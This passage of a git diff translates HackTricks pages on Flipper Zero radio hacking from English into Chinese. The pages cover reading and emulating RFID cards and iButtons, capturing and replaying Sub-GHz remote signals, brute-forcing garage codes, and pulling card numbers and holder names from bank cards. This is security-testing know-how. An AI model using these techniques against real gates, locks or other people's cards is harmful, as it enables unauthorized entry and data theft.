+例如，在这张EM-Marin卡中，可以**清晰地读取最后3个字节中的5个字节**。\
+如果您无法从卡片上读取其他2个字节，可以通过暴力破解来获取。
 
 <figure><img src="../../../images/image (104).png" alt=""><figcaption></figcaption></figure>
 
 - **HID**
 
-Same happens in this HID card where only 2 out of 3 bytes can be found printed in the card
+在这张HID卡中也是如此，只有3个字节中的2个可以在卡片上找到。
 
 <figure><img src="../../../images/image (1014).png" alt=""><figcaption></figcaption></figure>
 
-### Emulate/Write
+### 模拟/写入
 
-After **copying** a card or **entering** the ID **manually** it's possible to **emulate** it with Flipper Zero or **write** it in a real card.
+在**复制**一张卡或**手动输入**ID后，可以使用Flipper Zero**模拟**它或在真实卡片上**写入**它。
 
-## References
+## 参考
 
 - [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/)
 
@@ -59,4 +59,3 @@ After **copying** a card or **entering** the ID **manually** it's possible to **
 {% embed url="https://websec.nl/" %}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/radio-hacking/flipper-zero/fz-ibutton.md b/src/todo/radio-hacking/flipper-zero/fz-ibutton.md
index 4cd74e1ef..4ae47ba20 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-ibutton.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-ibutton.md
@@ -2,42 +2,41 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Intro
+## 介绍
 
-For more info about what is an iButton check:
+有关 iButton 的更多信息，请查看：
 
 {{#ref}}
 ../ibutton.md
 {{#endref}}
 
-## Design
+## 设计
 
-The **blue** part of the following imageis how you would need to **put the real iButton** so the Flipper can **read it.** The **green** part is how you need to **touch the reader** with the Flipper zero to **correctly emulate an iButton**.
+下图的 **蓝色** 部分是您需要 **放置真实 iButton** 的位置，以便 Flipper 可以 **读取它。** **绿色** 部分是您需要用 Flipper zero **接触读卡器** 的方式，以 **正确模拟 iButton**。
 
 <figure><img src="../../../images/image (565).png" alt=""><figcaption></figcaption></figure>
 
-## Actions
+## 操作
 
-### Read
+### 读取
 
-In Read Mode Flipper is waiting for the iButton key to touch and is able to digest any of three types of keys: **Dallas, Cyfral, and Metakom**. Flipper will **figure out the type of the key itself**. The name of the key protocol will be displayed on the screen above the ID number.
+在读取模式下，Flipper 正在等待 iButton 密钥接触，并能够处理三种类型的密钥：**Dallas, Cyfral, 和 Metakom**。Flipper 将 **自动识别密钥类型**。密钥协议的名称将显示在 ID 号码上方的屏幕上。
 
-### Add manually
+### 手动添加
 
-It's possible to **add manually** an iButton of type: **Dallas, Cyfral, and Metakom**
+可以 **手动添加** 类型为：**Dallas, Cyfral, 和 Metakom** 的 iButton。
 
-### **Emulate**
+### **模拟**
 
-It's possible to **emulate** saved iButtons (read or manually added).
+可以 **模拟** 已保存的 iButtons（读取或手动添加）。
 
 > [!NOTE]
-> If you cannot make the expected contacts of the Flipper Zero touch the reader you can **use the external GPIO:**
+> 如果您无法使 Flipper Zero 的预期接触点接触读卡器，您可以 **使用外部 GPIO：**
 
 <figure><img src="../../../images/image (138).png" alt=""><figcaption></figcaption></figure>
 
-## References
+## 参考
 
 - [https://blog.flipperzero.one/taming-ibutton/](https://blog.flipperzero.one/taming-ibutton/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/radio-hacking/flipper-zero/fz-infrared.md b/src/todo/radio-hacking/flipper-zero/fz-infrared.md
index ec5bbb74e..132d22177 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-infrared.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-infrared.md
@@ -1,41 +1,40 @@
-# FZ - Infrared
+# FZ - 红外线
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Intro <a href="#ir-signal-receiver-in-flipper-zero" id="ir-signal-receiver-in-flipper-zero"></a>
+## 介绍 <a href="#ir-signal-receiver-in-flipper-zero" id="ir-signal-receiver-in-flipper-zero"></a>
 
-For more info about how Infrared works check:
+有关红外线工作原理的更多信息，请查看：
 
 {{#ref}}
 ../infrared.md
 {{#endref}}
 
-## IR Signal Receiver in Flipper Zero <a href="#ir-signal-receiver-in-flipper-zero" id="ir-signal-receiver-in-flipper-zero"></a>
+## Flipper Zero 中的 IR 信号接收器 <a href="#ir-signal-receiver-in-flipper-zero" id="ir-signal-receiver-in-flipper-zero"></a>
 
-Flipper uses a digital IR signal receiver TSOP, which **allows intercepting signals from IR remotes**. There are some **smartphones** like Xiaomi, which also have an IR port, but keep in mind that **most of them can only transmit** signals and are **unable to receive** them.
+Flipper 使用数字 IR 信号接收器 TSOP，这 **允许拦截来自 IR 遥控器的信号**。有一些 **智能手机**，如小米，也有 IR 端口，但请记住，**大多数只能发送** 信号，**无法接收**。
 
-The Flipper infrared **receiver is quite sensitive**. You can even **catch the signal** while remaining **somewhere in between** the remote and the TV. Pointing the remote directly at Flipper's IR port is unnecessary. This comes in handy when someone is switching channels while standing near the TV, and both you and Flipper are some distance away.
+Flipper 的红外线 **接收器非常灵敏**。您甚至可以在 **遥控器和电视之间的某个地方** 捕捉信号。将遥控器直接指向 Flipper 的 IR 端口并不是必需的。当有人在电视旁边换频道时，这非常方便，而您和 Flipper 都在一定距离之外。
 
-As the **decoding of the infrared** signal happens on the **software** side, Flipper Zero potentially supports the **reception and transmission of any IR remote codes**. In the case of **unknown** protocols which could not be recognized - it **records and plays back** the raw signal exactly as received.
+由于 **红外线信号的解码** 在 **软件** 端进行，Flipper Zero 潜在支持 **接收和发送任何 IR 遥控代码**。在 **未知** 协议无法识别的情况下，它 **记录并回放** 原始信号，完全按照接收到的方式。
 
-## Actions
+## 操作
 
-### Universal Remotes
+### 通用遥控器
 
-Flipper Zero can be used as a **universal remote to control any TV, air conditioner, or media center**. In this mode, Flipper **bruteforces** all **known codes** of all supported manufacturers **according to the dictionary from the SD card**. You don't need to choose a particular remote to turn off a restaurant TV.
+Flipper Zero 可以用作 **通用遥控器来控制任何电视、空调或媒体中心**。在此模式下，Flipper **暴力破解** 所有支持制造商的 **已知代码**，**根据 SD 卡中的字典**。您无需选择特定的遥控器来关闭餐厅的电视。
 
-It is enough to press the power button in the Universal Remote mode, and Flipper will **sequentially send "Power Off"** commands of all the TVs it knows: Sony, Samsung, Panasonic... and so on. When the TV receives its signal, it will react and turn off.
+只需在通用遥控器模式下按下电源按钮，Flipper 将 **依次发送所有已知电视的“关机”** 命令：索尼、三星、松下……等等。当电视接收到信号时，它将做出反应并关闭。
 
-Such brute-force takes time. The larger the dictionary, the longer it will take to finish. It is impossible to find out which signal exactly the TV recognized since there is no feedback from the TV.
+这种暴力破解需要时间。字典越大，完成所需的时间就越长。无法确定电视确切识别了哪个信号，因为电视没有反馈。
 
-### Learn New Remote
+### 学习新遥控器
 
-It's possible to **capture an infrared signal** with Flipper Zero. If it **finds the signal in the database** Flipper will automatically **know which device this is** and will let you interact with it.\
-If it doesn't, Flipper can **store** the **signal** and will allow you to **replay it**.
+可以使用 Flipper Zero **捕捉红外线信号**。如果它 **在数据库中找到信号**，Flipper 将自动 **知道这是什么设备** 并允许您与之交互。\
+如果没有，Flipper 可以 **存储** 该 **信号** 并允许您 **重播** 它。
 
-## References
+## 参考
 
 - [https://blog.flipperzero.one/infrared/](https://blog.flipperzero.one/infrared/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/radio-hacking/flipper-zero/fz-nfc.md b/src/todo/radio-hacking/flipper-zero/fz-nfc.md
index 91236c1e7..e6a59dfa6 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-nfc.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-nfc.md
@@ -4,7 +4,7 @@
 
 ## Intro <a href="#id-9wrzi" id="id-9wrzi"></a>
 
-For info about RFID and NFC check the following page:
+有关RFID和NFC的信息，请查看以下页面：
 
 {{#ref}}
 ../pentesting-rfid.md
@@ -13,68 +13,67 @@ For info about RFID and NFC check the following page:
 ## Supported NFC cards <a href="#id-9wrzi" id="id-9wrzi"></a>
 
 > [!CAUTION]
-> Apart from NFC cards Flipper Zero supports **other type of High-frequency cards** such as several **Mifare** Classic and Ultralight and **NTAG**.
+> 除了NFC卡，Flipper Zero还支持**其他类型的高频卡**，例如几种**Mifare** Classic和Ultralight以及**NTAG**。
 
-New types of NFC cards will be added to the list of supported cards. Flipper Zero supports the following **NFC cards type A** (ISO 14443A):
+将会有新的NFC卡类型添加到支持的卡列表中。Flipper Zero支持以下**NFC卡类型A**（ISO 14443A）：
 
-- **Bank cards (EMV)** — only read UID, SAK, and ATQA without saving.
-- **Unknown cards** — read (UID, SAK, ATQA) and emulate an UID.
+- **银行卡（EMV）** — 仅读取UID、SAK和ATQA而不保存。
+- **未知卡** — 读取（UID、SAK、ATQA）并模拟UID。
 
-For **NFC cards type B, type F, and type V**, Flipper Zero is able to read an UID without saving it.
+对于**NFC卡类型B、F和V**，Flipper Zero能够读取UID而不保存。
 
 ### NFC cards type A <a href="#uvusf" id="uvusf"></a>
 
 #### Bank card (EMV) <a href="#kzmrp" id="kzmrp"></a>
 
-Flipper Zero can only read an UID, SAK, ATQA, and stored data on bank cards **without saving**.
+Flipper Zero只能读取银行卡的UID、SAK、ATQA和存储数据**而不保存**。
 
-Bank card reading screenFor bank cards, Flipper Zero can only read data **without saving and emulating it**.
+银行卡读取屏幕对于银行卡，Flipper Zero只能读取数据**而不保存和模拟**。
 
 <figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-26-31.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=916&#x26;w=2662" alt=""><figcaption></figcaption></figure>
 
 #### Unknown cards <a href="#id-37eo8" id="id-37eo8"></a>
 
-When Flipper Zero is **unable to determine NFC card's type**, then only an **UID, SAK, and ATQA** can be **read and saved**.
+当Flipper Zero**无法确定NFC卡的类型**时，仅能**读取和保存UID、SAK和ATQA**。
 
-Unknown card reading screenFor unknown NFC cards, Flipper Zero can emulate only an UID.
+未知卡读取屏幕对于未知NFC卡，Flipper Zero只能模拟UID。
 
 <figure><img src="https://cdn.flipperzero.one/Monosnap_Miro_2022-08-17_12-27-53.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=932&#x26;w=2634" alt=""><figcaption></figcaption></figure>
 
 ### NFC cards types B, F, and V <a href="#wyg51" id="wyg51"></a>
 
-For **NFC cards types B, F, and V**, Flipper Zero can only **read and display an UID** without saving it.
+对于**NFC卡类型B、F和V**，Flipper Zero只能**读取和显示UID**而不保存。
 
 <figure><img src="https://archbee.imgix.net/3StCFqarJkJQZV-7N79yY/zBU55Fyj50TFO4U7S-OXH_screenshot-2022-08-12-at-182540.png?auto=format&#x26;ixlib=react-9.1.1&#x26;h=1080&#x26;w=2704" alt=""><figcaption></figcaption></figure>
 
 ## Actions
 
-For an intro about NFC [**read this page**](../pentesting-rfid.md#high-frequency-rfid-tags-13.56-mhz).
+有关NFC的介绍[**请阅读此页面**](../pentesting-rfid.md#high-frequency-rfid-tags-13.56-mhz)。
 
 ### Read
 
-Flipper Zero can **read NFC cards**, however, it **doesn't understand all the protocols** that are based on ISO 14443. However, since **UID is a low-level attribute**, you might find yourself in a situation when **UID is already read, but the high-level data transfer protocol is still unknown**. You can read, emulate and manually input UID using Flipper for the primitive readers that use UID for authorization.
+Flipper Zero可以**读取NFC卡**，但是它**不理解所有基于ISO 14443的协议**。然而，由于**UID是一个低级属性**，您可能会发现自己处于一种情况，即**UID已经被读取，但高级数据传输协议仍然未知**。您可以使用Flipper读取、模拟和手动输入UID，以便为使用UID进行授权的原始读取器。
 
 #### Reading the UID VS Reading the Data Inside <a href="#reading-the-uid-vs-reading-the-data-inside" id="reading-the-uid-vs-reading-the-data-inside"></a>
 
 <figure><img src="../../../images/image (217).png" alt=""><figcaption></figcaption></figure>
 
-In Flipper, reading 13.56 MHz tags can be divided into two parts:
+在Flipper中，读取13.56 MHz标签可以分为两个部分：
 
-- **Low-level read** — reads only the UID, SAK, and ATQA. Flipper tries to guess the high-level protocol based on this data read from the card. You can't be 100% certain with this, as it is just an assumption based on certain factors.
-- **High-level read** — reads the data from the card's memory using a specific high-level protocol. That would be reading the data on a Mifare Ultralight, reading the sectors from a Mifare Classic, or reading the card's attributes from PayPass/Apple Pay.
+- **低级读取** — 仅读取UID、SAK和ATQA。Flipper尝试根据从卡片读取的数据猜测高级协议。您不能对此100%确定，因为这只是基于某些因素的假设。
+- **高级读取** — 使用特定的高级协议从卡片的内存中读取数据。这将是读取Mifare Ultralight上的数据、从Mifare Classic读取扇区或从PayPass/Apple Pay读取卡片属性。
 
 ### Read Specific
 
-In case Flipper Zero isn't capable of finding the type of card from the low level data, in `Extra Actions` you can select `Read Specific Card Type` and **manually** **indicate the type of card you would like to read**.
+如果Flipper Zero无法从低级数据中找到卡片类型，在`Extra Actions`中，您可以选择`Read Specific Card Type`并**手动****指明您想要读取的卡片类型**。
 
 #### EMV Bank Cards (PayPass, payWave, Apple Pay, Google Pay) <a href="#emv-bank-cards-paypass-paywave-apple-pay-google-pay" id="emv-bank-cards-paypass-paywave-apple-pay-google-pay"></a>
 
-Apart from simply reading the UID, you can extract a lot more data from a bank card. It's possible to **get the full card number** (the 16 digits on the front of the card), **validity date**, and in some cases even the **owner's name** along with a list of the **most recent transactions**.\
-However, you **can't read the CVV this way** (the 3 digits on the back of the card). Also **bank cards are protected from replay attacks**, so copying it with Flipper and then trying to emulate it to pay for something won't work.
+除了简单地读取UID，您还可以从银行卡中提取更多数据。可以**获取完整的卡号**（卡片正面的16位数字）、**有效期**，在某些情况下甚至可以获取**持卡人姓名**以及**最近交易**的列表。\
+但是，您**无法通过这种方式读取CVV**（卡片背面的3位数字）。此外，**银行卡受到重放攻击的保护**，因此使用Flipper复制后再尝试模拟支付是行不通的。
 
 ## References
 
 - [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md b/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
index 22c32f58a..53227b469 100644
--- a/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
+++ b/src/todo/radio-hacking/flipper-zero/fz-sub-ghz.md
@@ -4,13 +4,13 @@
 
 ## Intro <a href="#kfpn7" id="kfpn7"></a>
 
-Flipper Zero can **receive and transmit radio frequencies in the range of 300-928 MHz** with its built-in module, which can read, save, and emulate remote controls. These controls are used for interaction with gates, barriers, radio locks, remote control switches, wireless doorbells, smart lights, and more. Flipper Zero can help you to learn if your security is compromised.
+Flipper Zero 可以 **接收和发送 300-928 MHz 范围内的无线电频率**，其内置模块可以读取、保存和模拟遥控器。这些遥控器用于与门、障碍物、无线电锁、遥控开关、无线门铃、智能灯等进行交互。Flipper Zero 可以帮助您了解您的安全性是否受到威胁。
 
 <figure><img src="../../../images/image (714).png" alt=""><figcaption></figcaption></figure>
 
 ## Sub-GHz hardware <a href="#kfpn7" id="kfpn7"></a>
 
-Flipper Zero has a built-in sub-1 GHz module based on a [](https://www.st.com/en/nfc/st25r3916.html#overview)[CC1101 chip](https://www.ti.com/lit/ds/symlink/cc1101.pdf) and a radio antenna (the maximum range is 50 meters). Both the CC1101 chip and the antenna are designed to operate at frequencies in the 300-348 MHz, 387-464 MHz, and 779-928 MHz bands.
+Flipper Zero 具有基于 [](https://www.st.com/en/nfc/st25r3916.html#overview)[CC1101 芯片](https://www.ti.com/lit/ds/symlink/cc1101.pdf) 的内置 sub-1 GHz 模块和一根无线电天线（最大范围为 50 米）。CC1101 芯片和天线均设计用于在 300-348 MHz、387-464 MHz 和 779-928 MHz 频段内工作。
 
 <figure><img src="../../../images/image (923).png" alt=""><figcaption></figcaption></figure>
 
@@ -19,87 +19,86 @@ Flipper Zero has a built-in sub-1 GHz module based on a [](https://www.st.com
 ### Frequency Analyser
 
 > [!NOTE]
-> How to find which frequency is the remote using
+> 如何找到遥控器使用的频率
 
-When analysing, Flipper Zero is scanning signals strength (RSSI) at all the frequencies available in frequency configuration. Flipper Zero displays the frequency with the highest RSSI value, with signal strength higher than -90 [dBm](https://en.wikipedia.org/wiki/DBm).
+在分析时，Flipper Zero 正在扫描频率配置中所有可用频率的信号强度 (RSSI)。Flipper Zero 显示 RSSI 值最高的频率，信号强度高于 -90 [dBm](https://en.wikipedia.org/wiki/DBm)。
 
-To determine the remote's frequency, do the following:
+要确定遥控器的频率，请执行以下操作：
 
-1. Place the remote control very close to the left of Flipper Zero.
-2. Go to **Main Menu** **→ Sub-GHz**.
-3. Select **Frequency Analyzer**, then press and hold the button on the remote control you want to analyze.
-4. Review the frequency value on the screen.
+1. 将遥控器放置在 Flipper Zero 左侧非常靠近的位置。
+2. 转到 **主菜单** **→ Sub-GHz**。
+3. 选择 **频率分析仪**，然后按住您想要分析的遥控器上的按钮。
+4. 查看屏幕上的频率值。
 
 ### Read
 
 > [!NOTE]
-> Find info about the frequency used (also another way to find which frequency is used)
+> 查找使用的频率信息（也是查找使用的频率的另一种方法）
 
-The **Read** option **listens on the configured frequency** on the indicated modulation: 433.92 AM by default. If **something is found** when reading, **info is given** in the screen. This info could be use to replicate the signal in the future.
+**读取**选项 **在配置的频率上监听**，默认调制为 433.92 AM。如果在读取时 **找到某些内容**，则 **屏幕上会提供信息**。这些信息可以用于将来复制信号。
 
-While Read is in use, it's possible to press the **left button** and **configure it**.\
-At this moment it has **4 modulations** (AM270, AM650, FM328 and FM476), and **several relevant frequencies** stored:
+在使用读取时，可以按 **左按钮** 并 **进行配置**。\
+此时它有 **4 种调制方式**（AM270、AM650、FM328 和 FM476），并存储了 **几个相关频率**：
 
 <figure><img src="../../../images/image (947).png" alt=""><figcaption></figcaption></figure>
 
-You can set **any that interests you**, however, if you are **not sure which frequency** could be the one used by the remote you have, **set Hopping to ON** (Off by default), and press the button several times until Flipper captures it and give you the info you need to set the frequency.
+您可以设置 **任何您感兴趣的频率**，但是，如果您 **不确定遥控器使用的频率**，请 **将跳频设置为开启**（默认关闭），并多次按下按钮，直到 Flipper 捕获到它并提供您设置频率所需的信息。
 
 > [!CAUTION]
-> Switching between frequencies takes some time, therefore signals transmitted at the time of switching can be missed. For better signal reception, set a fixed frequency determined by Frequency Analyzer.
+> 在频率之间切换需要一些时间，因此在切换时传输的信号可能会丢失。为了更好的信号接收，请设置由频率分析仪确定的固定频率。
 
 ### **Read Raw**
 
 > [!NOTE]
-> Steal (and replay) a signal in the configured frequency
+> 在配置的频率上窃取（并重放）信号
 
-The **Read Raw** option **records signals** send in the listening frequency. This can be used to **steal** a signal and **repeat** it.
+**读取原始**选项 **记录在监听频率上发送的信号**。这可以用于 **窃取** 信号并 **重复** 它。
 
-By default **Read Raw is also in 433.92 in AM650**, but if with the Read option you found that the signal that interest you is in a **different frequency/modulation, you can also modify that** pressing left (while inside the Read Raw option).
+默认情况下 **读取原始也在 433.92 AM650**，但如果通过读取选项发现您感兴趣的信号在 **不同的频率/调制中，您也可以通过按左键进行修改**（在读取原始选项内）。
 
 ### Brute-Force
 
-If you know the protocol used for example by the garage door it's possible to g**enerate all the codes and send them with the Flipper Zero.** This is an example that support general common types of garages: [**https://github.com/tobiabocchi/flipperzero-bruteforce**](https://github.com/tobiabocchi/flipperzero-bruteforce)
+如果您知道例如车库门使用的协议，可以 **生成所有代码并通过 Flipper Zero 发送它们。** 这是一个支持一般常见类型车库的示例：[**https://github.com/tobiabocchi/flipperzero-bruteforce**](https://github.com/tobiabocchi/flipperzero-bruteforce)
 
 ### Add Manually
 
 > [!NOTE]
-> Add signals from a configured list of protocols
+> 从配置的协议列表中添加信号
 
-#### List of [supported protocols](https://docs.flipperzero.one/sub-ghz/add-new-remote) <a href="#id-3iglu" id="id-3iglu"></a>
+#### [支持的协议](https://docs.flipperzero.one/sub-ghz/add-new-remote) 列表 <a href="#id-3iglu" id="id-3iglu"></a>
 
-| Princeton_433 (works with the majority of static code systems) | 433.92 | Static  |
+| Princeton_433 (适用于大多数静态代码系统) | 433.92 | 静态  |
 | -------------------------------------------------------------- | ------ | ------- |
-| Nice Flo 12bit_433                                             | 433.92 | Static  |
-| Nice Flo 24bit_433                                             | 433.92 | Static  |
-| CAME 12bit_433                                                 | 433.92 | Static  |
-| CAME 24bit_433                                                 | 433.92 | Static  |
-| Linear_300                                                     | 300.00 | Static  |
-| CAME TWEE                                                      | 433.92 | Static  |
-| Gate TX_433                                                    | 433.92 | Static  |
-| DoorHan_315                                                    | 315.00 | Dynamic |
-| DoorHan_433                                                    | 433.92 | Dynamic |
-| LiftMaster_315                                                 | 315.00 | Dynamic |
-| LiftMaster_390                                                 | 390.00 | Dynamic |
-| Security+2.0_310                                               | 310.00 | Dynamic |
-| Security+2.0_315                                               | 315.00 | Dynamic |
-| Security+2.0_390                                               | 390.00 | Dynamic |
+| Nice Flo 12bit_433                                             | 433.92 | 静态  |
+| Nice Flo 24bit_433                                             | 433.92 | 静态  |
+| CAME 12bit_433                                                 | 433.92 | 静态  |
+| CAME 24bit_433                                                 | 433.92 | 静态  |
+| Linear_300                                                     | 300.00 | 静态  |
+| CAME TWEE                                                      | 433.92 | 静态  |
+| Gate TX_433                                                    | 433.92 | 静态  |
+| DoorHan_315                                                    | 315.00 | 动态 |
+| DoorHan_433                                                    | 433.92 | 动态 |
+| LiftMaster_315                                                 | 315.00 | 动态 |
+| LiftMaster_390                                                 | 390.00 | 动态 |
+| Security+2.0_310                                               | 310.00 | 动态 |
+| Security+2.0_315                                               | 315.00 | 动态 |
+| Security+2.0_390                                               | 390.00 | 动态 |
 
-### Supported Sub-GHz vendors
+### 支持的 Sub-GHz 供应商
 
-Check the list in [https://docs.flipperzero.one/sub-ghz/supported-vendors](https://docs.flipperzero.one/sub-ghz/supported-vendors)
+查看 [https://docs.flipperzero.one/sub-ghz/supported-vendors](https://docs.flipperzero.one/sub-ghz/supported-vendors) 中的列表
 
-### Supported Frequencies by region
+### 按区域支持的频率
 
-Check the list in [https://docs.flipperzero.one/sub-ghz/frequencies](https://docs.flipperzero.one/sub-ghz/frequencies)
+查看 [https://docs.flipperzero.one/sub-ghz/frequencies](https://docs.flipperzero.one/sub-ghz/frequencies) 中的列表
 
 ### Test
 
 > [!NOTE]
-> Get dBms of the saved frequencies
+> 获取保存频率的 dBms
 
 ## Reference
 
 - [https://docs.flipperzero.one/sub-ghz](https://docs.flipperzero.one/sub-ghz)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/radio-hacking/ibutton.md b/src/todo/radio-hacking/ibutton.md
index 112378be0..0033648ac 100644
--- a/src/todo/radio-hacking/ibutton.md
+++ b/src/todo/radio-hacking/ibutton.md
@@ -2,45 +2,44 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Intro
+## 介绍
 
-iButton is a generic name for an electronic identification key packed in a **coin-shaped metal container**. It is also called **Dallas Touch** Memory or contact memory. Even though it is often wrongly referred to as a “magnetic” key, there is **nothing magnetic** in it. In fact, a full-fledged **microchip** operating on a digital protocol is hidden inside.
+iButton 是一种电子识别钥匙的通用名称，装在一个 **硬币形状的金属容器** 中。它也被称为 **Dallas Touch** Memory 或接触式存储器。尽管它常常被错误地称为“磁性”钥匙，但里面 **没有任何磁性**。实际上，里面隐藏着一个完整的 **微芯片**，它在数字协议上运行。
 
 <figure><img src="../../images/image (915).png" alt=""><figcaption></figcaption></figure>
 
-### What is iButton? <a href="#what-is-ibutton" id="what-is-ibutton"></a>
+### 什么是 iButton？ <a href="#what-is-ibutton" id="what-is-ibutton"></a>
 
-Usually, iButton implies the physical form of the key and reader - a round coin with two contacts. For the frame surrounding it, there are lots of variations from the most common plastic holder with a hole to rings, pendants, etc.
+通常，iButton 指的是钥匙和读卡器的物理形态 - 一个带有两个接触点的圆形硬币。围绕它的框架有很多变体，从最常见的带孔塑料支架到戒指、挂件等。
 
 <figure><img src="../../images/image (1078).png" alt=""><figcaption></figcaption></figure>
 
-When the key reaches the reader, the **contacts come to touch** and the key is powered to **transmit** its ID. Sometimes the key is **not read** immediately because the **contact PSD of an intercom is larger** than it should be. So the outer contours of the key and the reader couldn't touch. If that's the case, you'll have to press the key over one of the walls of the reader.
+当钥匙接触到读卡器时，**接触点接触**，钥匙被供电以 **传输** 其 ID。有时钥匙 **不会立即被读取**，因为 **对讲机的接触 PSD 较大**。因此，钥匙和读卡器的外部轮廓无法接触。如果是这种情况，您需要将钥匙按在读卡器的一个墙面上。
 
 <figure><img src="../../images/image (290).png" alt=""><figcaption></figcaption></figure>
 
-### **1-Wire protocol** <a href="#id-1-wire-protocol" id="id-1-wire-protocol"></a>
+### **1-Wire 协议** <a href="#id-1-wire-protocol" id="id-1-wire-protocol"></a>
 
-Dallas keys exchange data using the 1-wire protocol. With only one contact for data transfer (!!) in both directions, from master to slave and vice versa. The 1-wire protocol works according to the Master-Slave model. In this topology, the Master always initiates communication and the Slave follows its instructions.
+Dallas 钥匙使用 1-wire 协议交换数据。仅用一个接触点进行数据传输 (!!)，双向传输，从主设备到从设备，反之亦然。1-wire 协议按照主从模型工作。在这种拓扑中，主设备始终发起通信，从设备遵循其指令。
 
-When the key (Slave) contacts the intercom (Master), the chip inside the key turns on, powered by the intercom, and the key is initialized. Following that the intercom requests the key ID. Next, we will look up this process in more detail.
+当钥匙（从设备）接触到对讲机（主设备）时，钥匙内部的芯片开启，由对讲机供电，钥匙被初始化。随后，对讲机请求钥匙 ID。接下来，我们将更详细地查看这个过程。
 
-Flipper can work both in Master and Slave modes. In the key reading mode, Flipper acts as a reader this is to say it works as a Master. And in the key emulation mode, the flipper pretends to be a key, it is in the Slave mode.
+Flipper 可以在主模式和从模式下工作。在钥匙读取模式下，Flipper 充当读卡器，也就是说它作为主设备工作。而在钥匙仿真模式下，Flipper 假装是钥匙，处于从模式。
 
-### Dallas, Cyfral & Metakom keys
+### Dallas、Cyfral 和 Metakom 钥匙
 
-For information about how these keys works check the page [https://blog.flipperzero.one/taming-ibutton/](https://blog.flipperzero.one/taming-ibutton/)
+有关这些钥匙如何工作的更多信息，请查看页面 [https://blog.flipperzero.one/taming-ibutton/](https://blog.flipperzero.one/taming-ibutton/)
 
-### Attacks
+### 攻击
 
-iButtons can be attacked with Flipper Zero:
+iButtons 可以通过 Flipper Zero 进行攻击：
 
 {{#ref}}
 flipper-zero/fz-ibutton.md
 {{#endref}}
 
-## References
+## 参考
 
 - [https://blog.flipperzero.one/taming-ibutton/](https://blog.flipperzero.one/taming-ibutton/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/radio-hacking/infrared.md b/src/todo/radio-hacking/infrared.md
index 5e2a12b64..b10c2a183 100644
--- a/src/todo/radio-hacking/infrared.md
+++ b/src/todo/radio-hacking/infrared.md
@@ -1,82 +1,81 @@
-# Infrared
+# 红外线
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## How the Infrared Works <a href="#how-the-infrared-port-works" id="how-the-infrared-port-works"></a>
+## 红外线的工作原理 <a href="#how-the-infrared-port-works" id="how-the-infrared-port-works"></a>
 
-**Infrared light is invisible to humans**. IR wavelength is from **0.7 to 1000 microns**. Household remotes use an IR signal for data transmission and operate in the wavelength range of 0.75..1.4 microns. A microcontroller in the remote makes an infrared LED blink with a specific frequency, turning the digital signal into an IR signal.
+**红外线对人类是不可见的**。红外线波长范围为**0.7到1000微米**。家用遥控器使用红外信号进行数据传输，工作波长范围为0.75..1.4微米。遥控器中的微控制器使红外LED以特定频率闪烁，将数字信号转换为红外信号。
 
-To receive IR signals a **photoreceiver** is used. It **converts IR light into voltage pulses**, which are already **digital signals**. Usually, there is a **dark light filter inside the receiver**, which lets **only the desired wavelength through** and cuts out noise.
+接收红外信号使用**光接收器**。它**将红外光转换为电压脉冲**，这些脉冲已经是**数字信号**。通常，接收器内部有一个**暗光滤波器**，只允许**所需波长通过**，并过滤掉噪声。
 
-### Variety of IR Protocols <a href="#variety-of-ir-protocols" id="variety-of-ir-protocols"></a>
+### 红外协议的多样性 <a href="#variety-of-ir-protocols" id="variety-of-ir-protocols"></a>
 
-IR protocols differ in 3 factors:
+红外协议在三个因素上有所不同：
 
-- bit encoding
-- data structure
-- carrier frequency — often in range 36..38 kHz
+- 位编码
+- 数据结构
+- 载波频率 — 通常在36..38 kHz范围内
 
-#### Bit encoding ways <a href="#bit-encoding-ways" id="bit-encoding-ways"></a>
+#### 位编码方式 <a href="#bit-encoding-ways" id="bit-encoding-ways"></a>
 
-**1. Pulse Distance Encoding**
+**1. 脉冲间距编码**
 
-Bits are encoded by modulating the duration of the space between pulses. The width of the pulse itself is constant.
+通过调制脉冲之间的间隔持续时间来编码位。脉冲本身的宽度是恒定的。
 
 <figure><img src="../../images/image (295).png" alt=""><figcaption></figcaption></figure>
 
-**2. Pulse Width Encoding**
+**2. 脉冲宽度编码**
 
-Bits are encoded by modulation of the pulse width. The width of space after pulse burst is constant.
+通过调制脉冲宽度来编码位。脉冲爆发后的间隔宽度是恒定的。
 
 <figure><img src="../../images/image (282).png" alt=""><figcaption></figcaption></figure>
 
-**3. Phase Encoding**
+**3. 相位编码**
 
-It is also known as Manchester encoding. The logical value is defined by the polarity of the transition between pulse burst and space. "Space to pulse burst" denotes logic "0", "pulse burst to space" denotes logic "1".
+也称为曼彻斯特编码。逻辑值由脉冲爆发与间隔之间的过渡极性定义。“间隔到脉冲爆发”表示逻辑“0”，“脉冲爆发到间隔”表示逻辑“1”。
 
 <figure><img src="../../images/image (634).png" alt=""><figcaption></figcaption></figure>
 
-**4. Combination of previous ones and other exotics**
+**4. 之前编码方式的组合及其他特殊方式**
 
 > [!NOTE]
